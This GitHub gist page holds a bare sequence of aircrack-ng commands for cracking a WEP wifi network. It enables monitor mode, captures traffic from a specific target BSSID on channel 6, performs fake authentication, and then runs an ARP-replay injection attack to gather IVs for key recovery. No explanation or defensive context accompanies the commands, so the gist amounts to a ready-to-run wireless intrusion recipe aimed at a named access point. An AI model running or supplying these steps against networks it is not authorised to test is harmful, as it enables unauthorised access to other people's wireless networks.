Skip to content

Instantly share code, notes, and snippets.

@itsbalamurali
Last active December 30, 2015 16:08
Show Gist options
  • Save itsbalamurali/7852312 to your computer and use it in GitHub Desktop.
Save itsbalamurali/7852312 to your computer and use it in GitHub Desktop.
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 --bssid -c (channel ) -w (file name to save )
airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
aireplay-ng - 1 3 -a (bssid of the target ) (interface)
aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment